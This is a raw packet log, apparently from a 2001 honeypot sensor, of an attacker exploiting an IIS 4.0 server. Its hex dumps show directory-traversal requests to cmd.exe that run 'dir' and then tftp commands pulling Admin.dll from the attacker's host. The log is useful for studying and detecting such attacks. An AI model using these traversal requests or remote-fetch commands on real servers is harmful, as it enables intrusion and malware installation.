seq=555059 ack=483908541 off=5 res=0 win=8683 urp=0 chksum=18674 Payload: length = 278 000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72 HTTP/1.1 500 Ser 010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65 ver Error..Serve 020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53 r: Microsoft-IIS 030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C /4.0..Date: Tue, 040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A 18 Sep 2001 16: 050 : 30 35 3A 32 33 20 47 4D 54 0D 0A 43 6F 6E 74 65 05:23 GMT..Conte 060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74 nt-Type: text/ht 070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 ml..Content-Leng 080 : 74 68 3A 20 31 33 39 0D 0A 0D 0A 3C 68 74 6D 6C th: 139....<html 090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72 ><head><title>Er 0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 ror</title></hea 0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 70 72 6F 63 d><body>The proc 0c0 : 65 73 73 20 63 61 6E 6E 6F 74 20 61 63 63 65 73 ess cannot acces 0d0 : 73 20 74 68 65 20 66 69 6C 65 20 62 65 63 61 75 s the file becau 0e0 : 73 65 20 69 74 20 69 73 20 62 65 69 6E 67 20 75 se it is being u 0f0 : 73 65 64 20 62 79 20 61 6E 6F 74 68 65 72 20 70 sed by another p 100 : 72 6F 63 65 73 73 2E 20 3C 2F 62 6F 64 79 3E 3C rocess. </body>< 110 : 2F 68 74 6D 6C 3E /html> ---------------------------------------------------------------------------- -- #(2 - 25610) [2001-09-18 10:21:42] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=1031 flags=0 offset=0 TTL=128 chksum=17812 TCP: port=80 -> dport: 4454 flags=***A***F seq=555337 ack=483908541 off=5 res=0 win=8683 urp=0 chksum=22807 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25611) [2001-09-18 10:21:43] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=64630 flags=0 offset=0 TTL=118 chksum=22308 TCP: port=4454 -> dport: 80 flags=*****R** seq=483908541 ack=179402671 off=5 res=0 win=0 urp=0 chksum=29184 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25612) [2001-09-18 10:21:43] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=64886 flags=0 offset=0 TTL=118 chksum=22048 TCP: port=4486 -> dport: 80 flags=******S* seq=483908786 ack=0 off=6 res=0 win=8192 urp=0 chksum=48017 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25613) [2001-09-18 10:21:43] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=5127 flags=0 offset=0 TTL=128 chksum=13712 TCP: port=80 -> dport: 4486 flags=***A**S* seq=556149 ack=483908787 off=6 res=0 win=8760 urp=0 chksum=15563 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25614) [2001-09-18 10:21:43] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=65142 flags=0 offset=0 TTL=118 chksum=38180 TCP: port=4454 -> dport: 80 flags=*****R** seq=483908541 ack=483908541 off=5 res=0 win=0 urp=0 chksum=64459 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25615) [2001-09-18 10:21:43] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=6775 flags=0 offset=0 TTL=119 chksum=14372 TCP: port=4486 -> dport: 80 flags=***A**** seq=483908787 ack=556150 off=5 res=0 win=8760 urp=0 chksum=21640 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25616) [2001-09-18 10:21:43] WEB-IIS cmd.exe access IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=137 ID=7031 flags=0 offset=0 TTL=119 chksum=14019 TCP: port=4486 -> dport: 80 flags=***AP*** seq=483908787 ack=556150 off=5 res=0 win=8760 urp=0 chksum=38842 Payload: length = 91 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32 020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir 030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho 040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec 050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close ---------------------------------------------------------------------------- -- #(2 - 25617) [2001-09-18 10:21:43] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=231 ID=6407 flags=0 offset=0 TTL=128 chksum=12245 TCP: port=80 -> dport: 4486 flags=***AP*** seq=556150 ack=483908884 off=5 res=0 win=8663 urp=0 chksum=720 Payload: length = 191 000 : 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK. 010 : 0A 53 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F .Server: Microso 020 : 66 74 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 ft-IIS/4.0..Date 030 : 3A 20 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 : Tue, 18 Sep 20 040 : 30 31 20 31 36 3A 30 35 3A 32 34 20 47 4D 54 0D 01 16:05:24 GMT. 050 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 .Content-Type: a 060 : 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74 pplication/octet 070 : 2D 73 74 72 65 61 6D 0D 0A 56 6F 6C 75 6D 65 20 -stream..Volume 080 : 69 6E 20 64 72 69 76 65 20 43 20 68 61 73 20 6E in drive C has n 090 : 6F 20 6C 61 62 65 6C 2E 0D 0A 56 6F 6C 75 6D 65 o label...Volume 0a0 : 20 53 65 72 69 61 6C 20 4E 75 6D 62 65 72 20 69 Serial Number i 0b0 : 73 20 38 30 42 34 2D 38 39 43 41 0D 0A 0D 0A s 80B4-89CA.... ---------------------------------------------------------------------------- -- #(2 - 25618) [2001-09-18 10:21:43] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=403 ID=6663 flags=0 offset=0 TTL=128 chksum=11817 TCP: port=80 -> dport: 4486 flags=***AP**F seq=556341 ack=483908884 off=5 res=0 win=8663 urp=0 chksum=24388 Payload: length = 363 000 : 20 44 69 72 65 63 74 6F 72 79 20 6F 66 20 43 3A Directory of C: 010 : 5C 49 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \Inetpub\scripts 020 : 0D 0A 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 31 ....09/18/01 11 030 : 3A 30 35 61 20 20 20 20 20 20 20 20 3C 44 49 52 :05a <DIR 040 : 3E 20 20 20 20 20 20 20 20 20 20 2E 0D 0A 30 39 > ...09 050 : 2F 31 38 2F 30 31 20 20 31 31 3A 30 35 61 20 20 /18/01 11:05a 060 : 20 20 20 20 20 20 3C 44 49 52 3E 20 20 20 20 20 <DIR> 070 : 20 20 20 20 20 2E 2E 0D 0A 30 39 2F 31 38 2F 30 ....09/18/0 080 : 31 20 20 31 31 3A 30 34 61 20 20 20 20 20 20 20 1 11:04a 090 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20 57,344 0a0 : 54 46 54 50 32 30 36 0D 0A 30 39 2F 31 38 2F 30 TFTP206..09/18/0 0b0 : 31 20 20 31 31 3A 30 35 61 20 20 20 20 20 20 20 1 11:05a 0c0 : 20 20 20 20 20 20 20 20 20 31 36 2C 33 38 34 20 16,384 0d0 : 54 46 54 50 32 32 32 0D 0A 30 39 2F 31 38 2F 30 TFTP222..09/18/0 0e0 : 31 20 20 31 31 3A 30 35 61 20 20 20 20 20 20 20 1 11:05a 0f0 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20 57,344 100 : 54 46 54 50 38 34 0D 0A 20 20 20 20 20 20 20 20 TFTP84.. 110 : 20 20 20 20 20 20 20 35 20 46 69 6C 65 28 73 29 5 File(s) 120 : 20 20 20 20 20 20 20 20 31 33 31 2C 30 37 32 20 131,072 130 : 62 79 74 65 73 0D 0A 20 20 20 20 20 20 20 20 20 bytes.. 140 : 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 150 : 20 32 2C 31 30 30 2C 35 34 33 2C 34 38 38 20 62 2,100,543,488 b 160 : 79 74 65 73 20 66 72 65 65 0D 0A ytes free.. ---------------------------------------------------------------------------- -- #(2 - 25619) [2001-09-18 10:21:43] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=15479 flags=0 offset=0 TTL=118 chksum=5924 TCP: port=4486 -> dport: 80 flags=*****R** seq=483908884 ack=1832837531 off=5 res=0 win=0 urp=0 chksum=41999 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25620) [2001-09-18 10:21:43] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=15735 flags=0 offset=0 TTL=118 chksum=5664 TCP: port=4519 -> dport: 80 flags=******S* seq=484037059 ack=0 off=6 res=0 win=8192 urp=0 chksum=50781 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25621) [2001-09-18 10:21:43] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=7943 flags=0 offset=0 TTL=128 chksum=10896 TCP: port=80 -> dport: 4519 flags=***A**S* seq=556630 ack=484037060 off=6 res=0 win=8760 urp=0 chksum=17846 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25622) [2001-09-18 10:21:44] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=17015 flags=0 offset=0 TTL=118 chksum=20772 TCP: port=4486 -> dport: 80 flags=*****R** seq=483908884 ack=483908884 off=5 res=0 win=0 urp=0 chksum=63741 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25623) [2001-09-18 10:21:44] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=25975 flags=0 offset=0 TTL=119 chksum=60707 TCP: port=4519 -> dport: 80 flags=***A**** seq=484037060 ack=556631 off=5 res=0 win=8760 urp=0 chksum=23923 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25624) [2001-09-18 10:21:44] WEB-IIS cmd.exe access IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=192 ID=26231 flags=0 offset=0 TTL=119 chksum=60299 TCP: port=4519 -> dport: 80 flags=***AP*** seq=484037060 ack=556631 off=5 res=0 win=8760 urp=0 chksum=26065 Payload: length = 136 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32 020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 66 74 70 /cmd.exe?/c+tftp 030 : 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 2E 31 38 -i 65.29.243.18 040 : 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 6C 6C 20 0 GET Admin.dll 050 : 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 30 63 3A c:\Admin.dll 0c: 060 : 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 2F \Admin.dll HTTP/ 070 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 1.0..Host: www.. 080 : 43 6F 6E 6E 6E 65 63 74 Connnect ---------------------------------------------------------------------------- -- #(2 - 25625) [2001-09-18 10:21:44] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=395 ID=8711 flags=0 offset=0 TTL=128 chksum=9777 TCP: port=80 -> dport: 4519 flags=***AP*** seq=556631 ack=484037212 off=5 res=0 win=8608 urp=0 chksum=62259 Payload: length = 355 000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat 010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv 020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II 030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue 040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16 050 : 3A 30 35 3A 32 34 20 47 4D 54 0D 0A 43 6F 6E 74 :05:24 GMT..Cont 060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215. 070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t 080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea 090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69 d><title>Error i 0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio 0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E n</title></head> 0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45 .<body><h1>CGI E 0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The spe 0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli 0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave 100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni 110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se 120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header 130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers 140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar 150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70 e:<p><p><pre></p 160 : 72 65 3E re> ---------------------------------------------------------------------------- -- #(2 - 25626) [2001-09-18 10:21:44] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=8967 flags=0 offset=0 TTL=128 chksum=9876 TCP: port=80 -> dport: 4519 flags=***A***F seq=556986 ack=484037212 off=5 res=0 win=8608 urp=0 chksum=23567 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25627) [2001-09-18 10:21:44] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=37751 flags=0 offset=0 TTL=118 chksum=49187 TCP: port=4519 -> dport: 80 flags=*****R** seq=484037212 ack=0 off=5 res=0 win=0 urp=0 chksum=64894 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25628) [2001-09-18 10:21:44] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=38007 flags=0 offset=0 TTL=118 chksum=48927 TCP: port=4559 -> dport: 80 flags=******S* seq=484037472 ack=0 off=6 res=0 win=8192 urp=0 chksum=50328 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25629) [2001-09-18 10:21:44] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=11015 flags=0 offset=0 TTL=128 chksum=7824 TCP: port=80 -> dport: 4559 flags=***A**S* seq=557271 ack=484037473 off=6 res=0 win=8760 urp=0 chksum=16752 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25630) [2001-09-18 10:21:44] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=38263 flags=0 offset=0 TTL=118 chksum=65059 TCP: port=4519 -> dport: 80 flags=*****R** seq=484037212 ack=484037212 off=5 res=0 win=0 urp=0 chksum=3657 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25631) [2001-09-18 10:21:45] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=632 flags=0 offset=0 TTL=119 chksum=20515 TCP: port=4559 -> dport: 80 flags=***A**** seq=484037473 ack=557272 off=5 res=0 win=8760 urp=0 chksum=22829 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25639) [2001-09-18 10:21:53] WEB-IIS cmd.exe access IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=192 ID=42111 flags=0 offset=0 TTL=119 chksum=44419 TCP: port=4559 -> dport: 80 flags=***AP*** seq=484037473 ack=557272 off=5 res=0 win=8760 urp=0 chksum=24715 Payload: length = 136 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32 020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 66 74 70 /cmd.exe?/c+tftp 030 : 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 2E 31 38 -i 65.29.243.18 040 : 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 6C 6C 20 0 GET Admin.dll 050 : 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 30 64 3A d:\Admin.dll 0d: 060 : 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 2F \Admin.dll HTTP/ 070 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 1.0..Host: www.. 080 : 43 6F 6E 6E 6E 65 63 74 Connnect ---------------------------------------------------------------------------- -- #(2 - 25640) [2001-09-18 10:21:53] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=395 ID=30727 flags=0 offset=0 TTL=128 chksum=53296 TCP: port=80 -> dport: 4559 flags=***AP*** seq=557272 ack=484037625 off=5 res=0 win=8608 urp=0 chksum=60909 Payload: length = 355 000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat 010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv 020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II 030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue 040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16 050 : 3A 30 35 3A 33 34 20 47 4D 54 0D 0A 43 6F 6E 74 :05:34 GMT..Cont 060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215. 070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t 080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea 090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69 d><title>Error i 0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio 0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E n</title></head> 0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45 .<body><h1>CGI E 0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The spe 0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli 0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave 100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni 110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se 120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header 130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers 140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar 150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70 e:<p><p><pre></p 160 : 72 65 3E re> ---------------------------------------------------------------------------- -- #(2 - 25641) [2001-09-18 10:21:53] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=30983 flags=0 offset=0 TTL=128 chksum=53395 TCP: port=80 -> dport: 4559 flags=***A***F seq=557627 ack=484037625 off=5 res=0 win=8608 urp=0 chksum=22473 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25642) [2001-09-18 10:21:54] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=49535 flags=0 offset=0 TTL=118 chksum=37403 TCP: port=4559 -> dport: 80 flags=*****R** seq=484037625 ack=0 off=5 res=0 win=0 urp=0 chksum=64441 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25643) [2001-09-18 10:21:54] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=44 ID=49791 flags=0 offset=0 TTL=118 chksum=37143 TCP: port=1476 -> dport: 80 flags=******S* seq=485198619 ack=0 off=6 res=0 win=8192 urp=0 chksum=6359 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25644) [2001-09-18 10:21:54] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=32263 flags=0 offset=0 TTL=128 chksum=52111 TCP: port=80 -> dport: 1476 flags=***A**S* seq=566664 ack=485198620 off=6 res=0 win=8760 urp=0 chksum=28925 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25645) [2001-09-18 10:21:54] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=50047 flags=0 offset=0 TTL=118 chksum=53275 TCP: port=4559 -> dport: 80 flags=*****R** seq=484037625 ack=484037625 off=5 res=0 win=0 urp=0 chksum=2791 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25646) [2001-09-18 10:21:54] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=60543 flags=0 offset=0 TTL=119 chksum=26139 TCP: port=1476 -> dport: 80 flags=***A**** seq=485198620 ack=566665 off=5 res=0 win=8760 urp=0 chksum=35002 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25647) [2001-09-18 10:21:54] WEB-IIS cmd.exe access IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=192 ID=60799 flags=0 offset=0 TTL=119 chksum=25731 TCP: port=1476 -> dport: 80 flags=***AP*** seq=485198620 ack=566665 off=5 res=0 win=8760 urp=0 chksum=36632 Payload: length = 136 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32 020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 66 74 70 /cmd.exe?/c+tftp 030 : 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 2E 31 38 -i 65.29.243.18 040 : 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 6C 6C 20 0 GET Admin.dll 050 : 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 30 65 3A e:\Admin.dll 0e: 060 : 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 2F \Admin.dll HTTP/ 070 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 1.0..Host: www.. 080 : 43 6F 6E 6E 6E 65 63 74 Connnect ---------------------------------------------------------------------------- -- #(2 - 25648) [2001-09-18 10:21:54] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=33799 flags=0 offset=0 TTL=128 chksum=50579 TCP: port=80 -> dport: 1476 flags=***A**** seq=566665 ack=485198772 off=5 res=0 win=8608 urp=0 chksum=35002 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25766) [2001-09-18 10:22:49] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=395 ID=26890 flags=0 offset=0 TTL=128 chksum=57133 TCP: port=80 -> dport: 1476 flags=***AP*** seq=566665 ack=485198772 off=5 res=0 win=8608 urp=0 chksum=7295 Payload: length = 355 000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat 010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv 020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II 030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue 040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16 050 : 3A 30 36 3A 33 30 20 47 4D 54 0D 0A 43 6F 6E 74 :06:30 GMT..Cont 060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215. 070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t 080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea 090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69 d><title>Error i 0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio 0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E n</title></head> 0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45 .<body><h1>CGI E 0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The spe 0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli 0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave 100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni 110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se 120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header 130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers 140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar 150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70 e:<p><p><pre></p 160 : 72 65 3E re> ---------------------------------------------------------------------------- -- #(2 - 25767) [2001-09-18 10:22:49] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=27146 flags=0 offset=0 TTL=128 chksum=57232 TCP: port=80 -> dport: 1476 flags=***A***F seq=567020 ack=485198772 off=5 res=0 win=8608 urp=0 chksum=34646 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25769) [2001-09-18 10:22:50] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=19119 flags=0 offset=0 TTL=118 chksum=2284 TCP: port=1476 -> dport: 80 flags=*****R** seq=485198772 ack=0 off=5 res=0 win=0 urp=0 chksum=20472 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25776) [2001-09-18 10:22:52] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=44 ID=26801 flags=0 offset=0 TTL=118 chksum=60133 TCP: port=2621 -> dport: 80 flags=******S* seq=488451082 ack=0 off=6 res=0 win=8192 urp=0 chksum=29501 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25777) [2001-09-18 10:22:52] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=30730 flags=0 offset=0 TTL=128 chksum=53644 TCP: port=80 -> dport: 2621 flags=***A**S* seq=625399 ack=488451083 off=6 res=0 win=8760 urp=0 chksum=58867 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25789) [2001-09-18 10:22:53] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=51889 flags=0 offset=0 TTL=119 chksum=34793 TCP: port=2621 -> dport: 80 flags=***A**** seq=488451083 ack=625400 off=5 res=0 win=8760 urp=0 chksum=64944 